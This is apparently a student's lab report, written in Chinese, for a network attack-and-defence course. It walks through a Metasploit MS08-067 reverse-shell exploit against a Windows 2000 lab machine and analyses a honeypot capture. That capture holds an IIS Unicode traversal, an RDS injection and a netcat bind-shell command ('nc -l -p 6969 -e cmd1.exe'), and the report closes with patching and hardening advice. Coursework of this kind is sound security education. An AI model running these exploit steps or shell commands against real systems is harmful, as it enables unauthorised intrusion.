20253914 2025-2026-2 《网络攻防实践》第6周作业
一、实践内容
- 学习并使用 Metasploit windows attacker
Metasploit Windows Attacker 是指利用 Metasploit Framework (MSF) 对 Windows 系统进行渗透攻击的过程与技术集合。它是渗透测试中最常用的工具链之一,通过模块化、自动化的方式实现从漏洞探测到权限控制的全流程攻击。 - 学习并解码NT系统破解攻击
NT 系统一般指 Windows NT 内核系列,包括 Windows NT/2000/XP/7/10/11、Server 2003~2025 等。通常指绕过登录密码、获取系统权限、破解 SAM 数据库等针对 Windows NT 安全机制的攻击手段。 - 学习并尝试windows系统远程渗透攻击和分析
指通过网络远程,利用 Windows 系统漏洞、弱口令、服务缺陷等,未授权入侵目标主机,获取控制权、数据或权限的攻击行为。
二、实践过程
(一)任务一
- 在kali输入 msfconsole,并通过search ms08_067搜索漏洞
![image]()
- 通过use windows/smb/ms08_067_netapi 进入漏洞工作目录,并使用show payloads 显示漏洞载荷
![image]()
输入命令 set payload generic/shell_reverse_tcp 设置载荷。
输入命令 set RHOST 192.168.200.20 设置win2k地址
输入命令 set LHOST 192.168.200.10 设置kali地址
输入exploit,发动攻击

4. 使用wireshark监控,并控制win2k做出操作

(二)任务二
使用wireshark打开解压后的文件,输入ip.addr == 213.116.251.162 && ip.addr == 172.16.1.106筛选出数据包

首次在第117数据包中发现%C0%AF,
%C0%AF 是 /(斜杠)的非法超长 UTF-8 编码,且常与 ../ 组合用于目录穿越,而 boot.ini 是 Windows 标志性系统文件,属于典型攻击目标
因此 推测攻击者在利用Unicode攻击访问boot.ini文件

在140数据包中可以发现攻击者想要获得msadcs.dll文件

在查看第149数据包时,发现SQL注入攻击:根据“ADM!ROX!YOUR!WORLD”特征字符串以及dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb的使用,可以推测出该攻击是由 msadc2.pl渗透攻击代码发起的

通过后续数据包,发现攻击者多次使用不同的密码,企图连接,但未成功

继续检查后面的数据包,发现攻击者猜对了密码,成功建立了FTP连接

继续检查发现,发现攻击者构建了远程 shell 通道。然后利用命令cmd1.exe /c nc -l -p 6969 -e cmd1.exe,使得攻击者连接 6969 端口,获得了访问权,并进入了交互式控制阶段。

锁定6969,查看其做了哪些操作

有dir,del ftpcom,type readme.e,net session >>yay3.txt等操作

能够在后面的数据包中读出,攻击者已发现是蜜罐

防范 MS08-067 漏洞攻击:
- 及时安装微软官方补丁 KB958644;
- 关闭 TCP 445、139 等危险端口;
- 启用并配置系统防火墙;
- 停止不必要的 Server 服务;
- 及时升级或停用已停止支持的老旧 Windows 系统。
防范 Unicode 目录遍历攻击
- 及时安装微软针对 IIS Unicode 漏洞的安全补丁,从根本修复解码漏洞。
- 严格配置网站目录权限,禁止 Web 进程访问系统盘和敏感目录。
- 在服务器端对用户输入的 URL 进行过滤,拦截包含 % c0% af 等异常编码的恶意字符。
- 关闭不必要的 IIS 目录浏览功能,限制路径遍历行为。
- 使用防火墙或 WAF 检测并阻断包含 Unicode 恶意编码的请求。
- 升级服务器系统和 Web 服务版本,避免使用存在历史编码漏洞的旧组件。
(三)任务三
攻击方信息:kali,使用MS08-067 漏洞,ip地址为192.168.200.10
攻击方:使用kali攻击win2k,其操作与任务一相同,具体配置为

使用exploit发动攻击

创建文件夹操作

可以看到靶机已创建文件夹

防守方:打开wireshark
能够追踪到攻击方进行的操作

三、学习中遇到的问题及解决
- 问题1:任务一中实验始终无法解决
![660f1cd001d90e542a2b9eac51ee649f]()
- 问题1解决方案:重装win2k,解决
四、实践总结
通过学习 Windows 远程渗透、NT 系统破解与 Metasploit 相关知识,我深刻认识到系统安全的重要性。了解了常见攻击流程、漏洞利用方式及密码破解原理,掌握了基本的渗透思路与安全分析方法。同时也树立了牢固的法律与安全意识,明白这些技术只能用于合法防护与学习。今后我会更加重视系统加固、补丁更新和权限管理,提升安全防护能力,做到知攻善防,规范使用技术,守护网络安全。


